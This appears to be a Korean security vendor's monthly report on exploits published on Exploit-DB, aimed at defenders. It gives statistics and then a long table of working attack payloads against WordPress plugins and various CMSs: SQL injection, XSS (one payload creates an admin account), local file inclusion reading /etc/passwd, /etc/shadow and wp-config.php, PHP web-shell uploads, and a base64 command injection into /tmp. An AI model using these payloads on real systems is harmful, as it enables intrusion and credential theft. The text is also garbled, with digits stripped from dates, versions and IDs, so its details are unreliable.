76 XSS 하 Huge-IT Slider admin.php XSS

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다. LFI 공격및 Directory Traversal 이성공하는이유는사용자의입력값을추가적인보안조치없이그대로시스템에서사용하기때문입니다. 이를응용하여다른공격시도가많이발생할수있으므로관리자는사용자입력값을시스템에서그대로사용하는것을최대한방지하여야됩니다. 이번달주요소프트웨어별발생현황에서는지난달에이어 Wordpress 에대한보고개수가가장많은것으로확인되었으며공격종류도다양한것으로분석되었습니다. Plugin 에대한대대적인업데이트가필요해보입니다.. 별보고개수 보고개수 LFI XSS 0 SQL 9 File Upload Command RFI Directory Traversal 총합계 8 40 5 0 5 0 5 0 5 0 0 LFI XSS SQL 9 별보고개수 File Upload Command RFI Directory Traversal 8 총합계. 위험도별분류위험도 보고개수 백분율 상 5.% 86.8% 하 0 0.0% 합계 8 00% 위험도별분류 5 상. 공격난이도별현황공격난이도 보고개수 백분율 상 7.9% 5.% 하 86.8% 총합계 8 00% 공격난이도별현황 상 하 4. 주요소프트웨어별발생현황소프트웨어이름 Vfront ZCMS Novius Pasworld TYPO BlackCat Vesta Control Panel Thycotic WedgeOS 총합계 보고개수 8 주요소프트웨어별발생현황 Vfront ZCMS Novius Pasworld TYPO BlackCat ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 78 SQL 하 LeagueManager.9. Plugin - / SQL 700 LFI 하 zm Ajax Login & Register Plugin.0.9 - admin-ajax.php LFI 75 File Upload 하 상 Nmedia Member Conversation Plugin.5.0 - doupload.php File Upload 709 LFI 하 Really Simple Guest Post - simple-guest-post-submit.php LFI 744 LFI 하 Plugin 'WP Mobile Edition' css.php LFI 74 mmand Inject 하 Wp-ImageZoom - div_img.php Command 764 XSS 하 Encrypted Contact Form Plugin.0.4 - options-general.php XSS 75 LFI 하 RobotCPA Plugin V5 - f.php SQL 754 LFI 하 History Collection - download.php LFI 775 File Upload 하 상 Aviary Image Editor Add On For Gravity Forms.0 - upload.php File Upload 774 LFI 하 SE HTML5 Album Audio Player..0 - download_audio.php LFI

76 XSS 하 Huge-IT Slider.7.5 - admin.php XSS

날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-06-0 78 SQL 하 05-06-0 786 XSS 하 05-06-0 786 XSS 하 05-06-0 786 XSS 하 05-06-04 700 LFI 하 EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. LeagueManager.9. Plugin - / SQL VFront 0.99. - variabili.php XSS VFront 0.99. - log.php XSS VFront 0.99. - query_editor.php XSS zm Ajax Login & Register Plugin.0.9 - adminajax.php LFI /?match=%0and%099=99 /vfront-0.99./vfront- 0.99./admin/variabili.php?feed=0&gidfocus=0 Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database. "/><script>alert(666)</script> /vfront-0.99./vfront- 0.99./admin/log.php?op="/><script>var xhr%dnew XMLHttpRequest();xhr.onreadystatechange%dfunction(){ if(xhr.status%d%d00){if(xhr.readystate%d%d4){al ert(xhr.responsetext);}}};xhr.open('post','utenze.db.php?i nsert_new',true);xhr.setrequestheader('contenttype','application/x-www-formurlencoded');xhr.send('nome%dhyprlinxe%6cognome %dapparitionsec%6email%dx@x.com%6passwd% dhacked%6passwd%dhacked');</script>&tabella=&ui d=&data_dal=all&data_al=all /vfront-0.99./vfront- 0.99./admin/query_editor.php?id=&id_table=&id_campo ="/><script>alert(666)</script> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 action=load_template&template=../etc/passwd LeagueManag er.9. Plugin Vfront VFront 0.99. Vfront VFront 0.99. Vfront VFront 0.99. zm Ajax Login & Register Plugin.0.9 05-06-05 75 File Upload 하상 Nmedia Member Conversation Plugin.5.0 - doupload.php File Upload POST /wordpress/wp-content/plugins/wordpress-memberprivate-conversation/doupload.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="lo.php" Content-Type: application/octet-stream Nmedia Member Conversation Plugin.5.0 <? phpinfo();?> -----------------------------7dd009908f-- 05-06-05 709 LFI 하 Really Simple Guest Post - simple-guest-postsubmit.php LFI POST /wp-content/plugins/really-simple-guest-post/simpleguest-post-submit.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Really Simple Guest Post rootpath=/etc/passwd 05-06-08 745 SQL 하 05-06-08 744 LFI 하 Pasworld - detail.php SQL Plugin 'WP Mobile Edition' css.php LFI /detail.php?id=%0and%0=-- /wp-content/themes/mtheme- Unus/css/css.php?files=../../../../wp-config.php Pasworld Pasworld All Versions Plugin 'WP Mobile Edition' 05-06-08 74 Command 05-06-09 748 SQL 하 하 Wp-ImageZoom - div_img.php Command /wp-content/plugins/wpimagezoom/div_img.php?cmd=delall Clone Script.0 - /milw0rm/related.php?program=lol' AND (SELECT * related.php SQL FROM (SELECT(SLEEP(5)))yYCj) AND 'mqub'='mqub Wp- ImageZoom..0 Clone Script.0 05-06-0 764 XSS 하 Encrypted Contact Form Plugin.0.4 - optionsgeneral.php XSS POST /wp-admin/options-general.php?page=conformconf HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Encrypted Contact Form Plugin.0.4 iframe_url="></iframe><script>alert('xss!');</script>

EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-06-0 76 LFI 하.6 - // LFI POST /wp-admin/options-general.php?page=conformconf HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Cookie: lang=../../../../../../../etc/passwd%00.6 05-06-0 760 Directory Traversal 05-06-0 759 SQL 상 하 6.5. - /bonita/portal/ Directory Traversal.0.5.4p6 - show_sys_state.php SQL /bonita/portal/themeresource?theme=portal/../../../../../../../../../../../../../../../../&location=windows/system.ini /monitor/show_sys_state.php?state=server&server=- %0UNION%0SELECT%0,version%8%9%0-- %0-6.5..0.5.4p6 05-06-0 75 LFI 하 RobotCPA Plugin V5 - f.php SQL /wpcontent/plugins/robotcpa/f.php?l=cghwoi8vzmlsdgvylj lc9cmnlps4vli4vli4vli4vdaty9uzmlnlnboca== RobotCPA Plugin V5 05-06-0 754 LFI 하 05-06-0 760 RFI 하 History Collection - download.php LFI 6.5. - login.jsp RFI /wordpress/wp-content/plugins/historycollection/download.php?var=../../../wp-config.php /bonita/login.jsp?_l=en&redirecturl=//immuniweb.com/ History Collection <=.. 6.5. 05-06- 775 File Upload 하상 Aviary Image Editor Add On For Gravity Forms.0 - upload.php File Upload POST /wp-content/plugins/aviary-image-editor-add-on-forgravity-forms/includes/upload.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="shell.php" Content-Type: application/octet-stream Aviary Image Editor Add On For Gravity Forms.0 <? phpinfo();?> -----------------------------7dd009908f-- 05-06- 774 LFI 하 05-06- 77 SQL 하 SE HTML5 Album Audio Player..0 - download_audio.php LFI ZCMS. - /ZCMS_./ SQL /wp-content/plugins/se-html5-album-audioplayer/download_audio.php?file=/wpcontent/uploads/../../../../../etc/passwd POST /ZCMS_./ZCMS_./?dir=login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 SE HTML5 Album Audio Player..0 ZCMS ZCMS. username=admin&pass=hell' OR ''=' 05-06- 77 XSS 하 ZCMS. - /ZCMS_./ XSS /ZCMS_./ZCMS_./?dir=editpost&p=&title="<script>a lert()</script>&content=<script>alert()</script>&author= <script>alert()</script>satan&visibility=&type=&comm =0 05-06- 77 XSS 하 ZCMS. - index.jsp XSS /ZCMS_./ZCMS_./index.jsp?dir=editpost&p=&autho r=<script>alert(666)</script> 05-06- 770 XSS 하 POST /kilrizzy--cms-f7464/kilrizzy--cmsf7464/index.php/system/settings HTTP/. CMS - /kilrizzy-- User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 CMS-f7464/kilrizzy-- CMSf7464/index.php/system/setti Chrome/6.0.9.75 Safari/55.7 ngs XSS ZCMS ZCMS. ZCMS ZCMS. CMS f7464 from_name=<script>alert(666)</script> 05-06- 770 LFI 하 CMS - /kilrizzy-- CMS-f7464/kilrizzy-- CMSf7464/index.php/connector LFI /kilrizzy--cms-f7464/kilrizzy--cmsf7464/index.php/connector$url=../../../../../../xampp/ph pinfo.php CMS f7464 05-06-6 70 SQL 상상 /typoconf/ext/sb_akronymmanager/mod/index.php? TYPO Akronymmanager id=79%7%0union%0select%0(select%0gro Extension 0.5.0 - index.php SQL up_concat(username,%7:%7,password) %0FROM%0be_users),%0--%0 TYPO TYPO Akronymman ager Extension 0.5.0 05-06-7 704 LFI 하 BlackCat CMS.. - logs.php LFI /blackcat/modules/blackcat/widgets/logs.php?dl=../config. php BlackCat BlackCat CMS..

EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-06-4 769 Command 상 Vesta Control Panel 0.9.8 - index.php Command /list/backup/index.php?backup=%7%0 %0 echo 'V0VCXNZURFTXxzOjc6ImFwYWNoZTIiOdFQl9SRJPV VBTfHM6ODoiddLWRhdGEiOdFQl9QTJUfHM6NDoiO DA4MCI7V0VCXNTTHxzOjc6ImvZF9zcwiOdFQl9TU0x fue9svhxzojq6ijg0ndmiobsthzxnzurftxxzoju6i m5naw54ijtquk9ywv9qtjufhm6mjoiodaiobsthzx NTTF9QTJUfHM6MzoiNDQzIjtGVFBfUlTVEVNfHM6Njoi dnnmdhbkijtnqulmxnzurftxxzoju6imv4aw00ijtjtu FQXNZURFTXxzOjc6ImRvdmVjbQiO0FOVElWSVJVU9 TWVNURU8czowOiIiO0FOVElTUEFNXNZURFTXxzOjA6I Vesta Control ii7rejfultvevnfhm6ntoibxlzcwwio0rou9twvnuru Panel 8czoOiJiaW5kOSI7URBVFNfUlTVEVNfHM6MTc6IndlY mfsaxplcixhdn0yxrzijtcqunlvvbfultvevnfhm6ntoi bg9jywwio0nst05fultvevnfhm6ndoiyjvbii7relts9 RVU9UQXxzOjI6Im5vIjtGSVJFV0FMTF9TWVNURU8czo4O ijpchrhymxlcyi7rklsrvdbtexfrvhuru5tsu9ofhm6odoi ZmFpbDJiYW4iOJFUE9TSVRPUll8czoOiJjbWudCI7VkVS U0lPTnxzOjU6IjAuOS44IjtMQU5HVUFHRXxzOjI6ImVuIjtsY W5ndWFnZXxzOjI6ImVuIjtcVyfHM6NToiYWRtaW4iOJ hyt8czoxmtoilxpcqvdxnlci8iow==' base64 -- decode > /tmp/sess_45%0 %0echo%0\ Vesta Control Panel 0.9.8 05-06-4 764 File Upload 하 SimpleImageUpload - index.php File Upload POST /index.php?option=com_simpleimageupload&view=uploa d&tmpl=component&e_name=desc HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f SimpleImageU pload.0 -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="l0v.php." Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05-06-4 76 SQL 상상 0.0. - register.php SQL POST /genixcms/register.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 0.0. email='and(select%0%0from%0(select%0count(*),concat(version(),floor(rand(0)*))x%0from%0informa tion_schema.tables%0group%0by%0x)a)and'&pass =cfreer&pass=cfreer&register=&token=&userid=poc-lab 05-06-4 76 XSS 하 Huge-IT Slider.7.5 - admin.php XSS POST /wordpress/wpadmin/admin.php?page=sliders_huge_it_slider&id=&task =apply HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Huge-IT Slider.7.5 titleimage4=%+onmouseover%dalert%8%fi0aki N_hack%F%9+a%D%& 05-06-4 760 XSS 하 05-06-6 794 XSS 하 05-06-0 7446 SQL 하 0.0. - index.php XSS Thycotic Secret Server 8.8.000004 - /SecretServer/api.ashx/simpleho me/ XSS CMS.0_.9. - rating.php SQL /-master/master/gxadmin/index.php?page=posts&q='<script>alert ('XSS By Hyprlinx')</script> /SecretServer/api.ashx/simplehome/GetSecretItemValue?s ecretitemid=<script>alert();</script>&audi taction=unmask POST //fiyocms/apps/app_article/controller/rating.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Thycotic 0.0. Thycotic Secret Server 8.8.000004 CMS.0_.9. do=getrate&id=8;select sleep(5) --

EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-06-0 7446 SQL CMS.0_.9. - /fiyocms/user/login SQL POST /fiyocms/user/login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 CMS.0_.9. 05-06-0 744 LFI 하 05-06-0 749 LFI 하 05-06-0 749 RFI 하 user='%b(select(0)from(select(sleep(5)))v)%b'&pass=p oc-lab&login=login WedgeOS <= 4.0.4 - /ssgmanager/ssgimages?name=../../../../../etc/shadow /ssgmanager/ LFI Novius 5.0. - /novius-os.5.0.- /novius-os.5.0.-elche/noviusos/admin/?tab=../../../../xampp/phpinfo.php elche/novius-os/admin/ LFI Novius 5.0. - /novius-os.5.0.- elche/novius-os/admin/nos/ RFI /novius-os.5.0.-elche/noviusos/admin/nos/login?redirect=http://www.satansbronze BABYSHOES.com WedgeOS WedgeOS <= 4.0.4 Novius Novius 5.0. Novius Novius 5.0.